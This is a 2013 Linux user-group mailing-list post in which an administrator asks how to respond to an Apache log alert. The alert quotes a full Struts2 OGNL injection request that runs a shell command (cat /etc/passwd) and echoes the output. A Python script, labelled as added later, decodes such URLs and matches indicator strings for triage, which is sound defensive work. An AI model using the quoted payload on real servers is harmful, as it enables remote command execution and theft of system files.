[TriLUG] Log message from Apache

Brian McCullough bdmc at bdmcc-us.com
Wed Jul 10 13:53:14 EDT 2013


Folks,

I have received an interesting message from Apache, and am not sure
what I can do to respond.  (It seems that the site is interesting to
.cn!)  Suggestions, ideas?


 A total of 5 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):

       /?('%5c43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('%5c43context%5b%5c'xwork.MethodAccessor.denyMethodExecution%5c'%5d%5c75false')(b))&('%5c43c')(('%5c43_memberAccess.excludeProperties%5c75 at java.util.Collections@EMPTY_SET')(c))&(g)(('%5c43req%5c75 at org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('%5c43webRootzpro%5c75 at java.lang.Runtime@getRuntime().exec(%5c43req.getParameter(%2522cmd%2522))')(d))&(i)(('%5c43webRootzproreader%5c75new%5c40java.io.DataInputStream(%5c43webRootzpro.getInputStream())')(d))&(i01)(('%5c43webStr%5c75new%5c40byte%5b51020%5d')(d))&(i1)(('%5c43webRootzproreader.readFully(%5c43webStr)')(d))&(i111)(('%5c43webStr12%5c75new%5c40java.lang.String(%5c43webStr)')(d))&(i2)(('%5c43xman%5c75 at org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('%5c43xman%5c75 at org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('%5c43xman.getWriter().println(%22~%22%252b%22~not_exist_in_html~%22%252b%5c43webStr12%252b%22~%22!
        %252b%22~3.1415621~%22)')(d))&(i99)(('%5c43xman.getWriter().close()')(d))&cmd=cat+%252Fetc%252Fpasswd
	%HTTP Response 200
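
A triage sketch for the report quoted above, added here as an example and not part of the original post: it undoes the nested percent-encoding and the `\NN` octal escapes in a logged URL, then lists which tokens from the request it contains. The indicator list, the function names and the sample lines are assumptions built from strings visible in the post.

```python
import re
from urllib.parse import unquote

# Tokens taken from the request quoted in the post above.
INDICATORS = (
    "_memberAccess",
    "allowStaticMethodAccess",
    "xwork.MethodAccessor.denyMethodExecution",
    "java.lang.Runtime",
    "org.apache.struts2.ServletActionContext",
)

OCTAL_ESCAPE = re.compile(r"\\([0-7]{2,3})")


def normalize(url, max_rounds=5):
    """Undo nested percent-encoding, then octal escapes such as \\43 (#) and \\75 (=)."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), url)


def triage(url, status):
    """Return (matched indicators, verdict) for one logged request."""
    text = normalize(url)
    hits = [tok for tok in INDICATORS if tok in text]
    if not hits:
        return hits, "no match"
    # A 200 only says the server answered the path. A site with no Struts2
    # application typically serves its normal page and ignores the query string.
    if status == 200:
        return hits, "check whether Struts2 is deployed"
    return hits, "not answered with 200"


# Constructed samples: the first parameter of the logged request, and a benign URL.
SAMPLES = [
    ("/?('%5c43_memberAccess.allowStaticMethodAccess')(a)=true", 200),
    ("/index.html?page=2", 200),
]

if __name__ == "__main__":
    for url, status in SAMPLES:
        print(status, triage(url, status), normalize(url))
```
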

